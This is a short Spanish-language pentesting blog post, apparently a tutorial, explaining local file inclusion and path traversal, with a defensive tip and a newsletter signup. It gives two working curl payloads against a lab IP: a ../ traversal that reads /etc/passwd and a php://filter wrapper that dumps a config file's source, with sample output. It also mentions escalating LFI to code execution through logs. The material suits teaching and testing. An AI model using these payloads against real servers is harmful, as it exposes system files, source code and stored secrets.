~ / blog / pentesting
KALI

Lfi y path traversal

Cuando una web carga archivos por un parámetro, a veces puedes engañarla para que lea archivos del sistema.

Con puntos y barras subes de carpeta hasta llegar al archivo de contraseñas del sistema. Si el servidor guarda logs con datos que tú controlas, incluso puedes convertir un LFI en ejecución de código.

Nunca metas la entrada del usuario directo en una ruta de archivo.

# los comandos

kali@kali:~$ curl 'http://10.0.0.5/page?file=../../../../etc/passwd'copiar
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:...
kali@kali:~$ curl 'http://10.0.0.5/page?file=php://filter/convert.base64-encode/resource=config'copiar
PD9waHAgJGRiX3Bhc3M... (código fuente en base64)
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.
root@cero: ~/newsletter
┌──(root@cero)-[~]
└─# suscribir --envio-semanal
un comando a la semana que te hace más difícil de hackear.
una sola herramienta, explicada en español claro, cada semana. lo mejor de los reels, directo a tu correo.
email =
sin spam. un correo a la semana. te sales cuando quieras.